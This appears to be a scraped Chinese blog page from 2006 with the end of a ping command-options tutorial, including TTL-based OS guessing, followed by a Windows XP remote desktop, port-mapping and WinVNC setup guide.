-v TOS Type Of Service. 　　将“服务类型”字段设置为tos指定的值。 　　-r count Record route for count hops. 　　在“记录路由”字段中记录伝出和返回数据包的路由。 　　在一般情况下你发送的数据包是通过一个个路由才到达对方的，但到底是经过了哪些路由呢？通过此参数就可以设定你想探测经过的路由的个数，不过限制在了9个，也就是说你只能跟踪到9个路由，如果想探测更多，可以通过其它命令实现，我将在以后的文章中给大家讲解。以下为筥例： 　　C:＼>ping -n 1 -r 9 202.96.105.101(发送一个数据包，最多记录9个路由) 　　Pinging 202.96.105.101 with 32 bytes of data: 　　Reply from 202.96.105.101: bytes=32 time=10ms TTL=249 　　Route: 202.107.208.187 -> 　　202.107.210.214 -> 　　61.153.112.70 -> 　　61.153.112.89 -> 　　202.96.105.149 -> 　　202.96.105.97 -> 　　202.96.105.101 -> 　　202.96.105.150 -> 　　61.153.112.90 　　Ping statistics for 202.96.105.101: 　　Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), 　　Approximate round trip times in milli-seconds: 　　Minimum = 10ms, Maximum = 10ms, Average = 10ms 　　从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187，202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。 　　-s count Timestamp for count hops. 　　指定count指定的?点数的时间戳。 　　此参数和-r差不多，只是这个参数不记录数据包返回所经过的路由，最多也只记录4个。 　　-j host-list Loose source route along host-list. 　　利用computer-list指定的计算机列表路由数据包。连续计算机可以被中间关网?分隔(路由稀疏源)IP允许的最大?量为9。 　　-k host-list Strict source route along host-list. 　　利用computer-list指定的计算机列表路由数据包。连续计算机不能被中间网?分隔(路由?格源)IP允许的最大数量为9。 　　-w timeout Timeout in milliseconds to wait for each reply. 　　指定超时间隔，单位为毫秒。 　　此参数?有什么其它技巧。 　　ping指令的其它技巧：在一般情况下还可以通过ping对方让对方返回给你的TTL值大小，粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列，一般情况下Windows系列的系?返回的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间，当然TTL的值在对方的主机里是可以修改的，Windows系列的系?可以通过修改注?表以下键值实现： 　　[HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼
okone96 发表于:2006.11.07 18:29 ::分类: ( 操作系统 ) ::阅读:(88次) :: 评论 (0)
===========================================================
远程桌面
===========================================================
远程桌面
默认状态下，Windows 2000及其之前的系统并没有安装远程桌面，要想在这些系统中使用远程桌面，需要自己手工添加。

　　在Windows XP系统安装光盘的“SUPPORTTOOLS”目录中，可找到一个名为“Msrdpcli.exe”的程序，它实际上就是远程桌面连接登录器。将此程序复制到没有远程桌面的系统中并运行后，即可自动在系统中安装远程桌面连接程序。安装过程非常简单，连续点击“下一步”即可，当安装完成后，点击“开始→程序→附件→通讯→远程桌面连接”，便能登录网络连接远程计算机了。

　　让远程桌面支持多用户

　　Windows XP不支持多个用户同时登录远程桌面，当其他用户远程登录Windows XP时，主机上当前已登录的用户即会自动退出。不过在Windows XP SP2中提供了允许连接会话并发功能，可通过远程桌面进行多用户的同时登录，但其在默认状态下关闭了该项特性，需要通过修改注册表开启该功能。

　　打开注册表编辑器，依次展开“HKEY_LOCAL_MACHINESystem
CurrentControlSetControlTerminal ServerLicensing Core”分支，转到右侧窗口，在其中新建一个类型为DWORD的子键，将该键命名为“EnableConcurrentSessions”，并将键值设置为“1”，即可开启多用户登录功能。

　　在远程桌面中传输文件

　　在进行远程桌面操作时，有时需要在远程服务器与本地计算机传输文件，这是很麻烦的事。其实在远程桌面程序中内置了映射磁盘的功能，通过该功能便可以实现远程登录服务器时，自动将本地计算机的磁盘映射到远程服务器上，让传送文件变得更加简单快捷。

　　在“远程桌面连接程序”中展开“选项”，选择“本地资源”标签，钩选中“磁盘驱动器”。连接到远程登录到服务器上后，打开服务器的“我的电脑”，就会发现本地计算机的磁盘以及软驱、光驱都映射到了服务器上，这样传送文件便可像操作本地硬盘一样方便了

在默认情况下，微软远程桌面连接将会分别在服务端和远程客户端使用的端口为3389端口，在设置NAT端口映射时，你可以将内网的3389端口映射在NAT服务器上的6666(也可以是其它没有被占用的数值)端口中，这样在远程客户端连接6666时就会连接到内网的3389端口。
　　1.通过XP远程桌面连接
　　端口映射就是将内网电脑上的远程控制软件使用的那个端口映射到网关的某个端口上，这样用网关的公网IP加映射的端口号就可以对内网的电脑进行远程控制了。大多数路由器和网关软件都带有端口映射功能，也可以借助一些端口映射软件，如WinRoute Pro等，如果是用Windows XP的共享连接的方法共享上网的，它本身也带有端口映射功能，下面就以Windows XP自带的远程桌面为例，介绍一下它的设置方法。
　　在作网关的电脑的共享连接图标上点右键，选“属性”，打开连接属性窗口，选“高级”那项，再点击“设置”，会出现“高级设置”的对话框。
　　注意其中有一项“远程桌面”，勾选这项，会弹出一个“服务设置”的窗口，其中的端口号等设置已经设好了，我们只要添加上被控端的内网IP(比如192.168.1.3)就可以了，点两次确定后就设置好了远程桌面的端口映射。
　　然后启用被控端的远程控制，默认情况下这项是禁用的。具体做法是：在“我的电脑”图标上单击右键，选择“属性”，在弹出的“系统属性”窗口中选择“远程”选项。勾选“允许从这台计算机发送远程邀请”和“允许用户远程连接到这台计算机”，点击“选择远程用户”可以选择具有远程控制权的用户(默认管理员有控制权)，进行远程控制的用户都要设置密码。
　　需要进行远程控制时，在主控端的电脑上点击“开始→所有程序→附件→通讯→远程桌面连接”来启动远程桌面连接；如果主控端是Windows 98或者其他版本的Windows，可以把XP的安装光盘放入光驱，在自动运行界面上依次点击“执行其他任务→设置远程桌面连接”来安装远程桌面连接程序。
　　启动了远程桌面连接后，会出现一个窗口，这里我们要输入被控端的网关的公网IP(比如218.193.12.115，注意不是被控端的内网IP)，连接成功后会出来个窗口，要输入用户名、密码，稍等片刻就可以进行远程控制了。
　　2.家庭版XP的远程协助方案
　　家庭版的Windows XP只有远程协助的功能，“远程”选项中只有“允许从这台计算机发送远程邀请”的选项，如果被控端是Windows XP家庭版，就不能用“远程桌面连接”来进行远程控制，不过可以用“远程协助”。
　　首先，按上文的方法在被控端上设置好端口映射，然后点击“开始→所有程序→远程协助”来打开远程协助，依次点击“邀请某人帮助您→将邀请保存为文件(高级)”，输入姓名并调整过期时间，再设置好密码，最后保存邀请。系统会保存下一个不到1KB的文件，里面记录了连接信息，不过内网用户把它直接发给主控端是不行的，我们要用记事本把它打开，可以看到里面有段记载了内网IP(比如192.168.1.3:3389)，将其改为“网关IP：外部端口号”(比如218.193.12.115:3398，3389为Windows XP远程控制默认的端口号)，并保存。
　　我们要在过期时间内把这个文件用邮件等方式发给主控端，并把密码告诉给他，主控端打开文件时会自动启动远程协助，输入密码后连接被控端，连接成功后，被控端会出现一个请求远程协助的窗口，点击“是”同意进行远程协助，此时只能看被控端的屏幕,要想进行控制，就点击“获取控制权”，这时被控端会出现一个窗口请求共享控制，点击“是”同意后才能进行控制，还可以进行传送文件等，远程控制完毕，要断开连接。Windows XP专业版也可以用这种方法进行远程控制。
　　3.通过软件实现端口映射
　　也可以用其他远程控制软件来实现端口映射，下面以广泛使用的免费远程控制软件Winvnc为例，说明其设置方法。
　　首先设置端口映射，按上文所述打开共享连接中“高级设置”的对话框，Winvnc的设置没有在列表中，接下来就点“添加”，在弹出的“服务设置”对话框中填入服务描述(如Winvnc，可以随便取)，再填上被控端的内网IP(比如192.168.1.3)，“此服务的内部端口号”中填Winvnc的控制端口(默认为5900)，“此服务的外部端口号”中填入映射后的端口号(可随便取，建议与内部端口号一致)，连接方式选“TCP”，这样就设置了端口映射。
　　Winvnc现在有汉化版了，下载安装完后，开机会自动启动Winvnc，在右下角的任务栏会出现白色的VNC的小图标，在小图标上面点右键，选择“特性(P)”会出现设置窗口(如图8)，在“密码”中填入验证密码。如果勾选那项“启用Java查看器(J)”，那么主控端就无须安装Winvnc，可直接用支持Java的浏览器进行控制，最好把“移除桌面墙纸”那项勾选，这样可以提高远程控制的速度，其他设置用默认就可以了，设置好后按确定即可。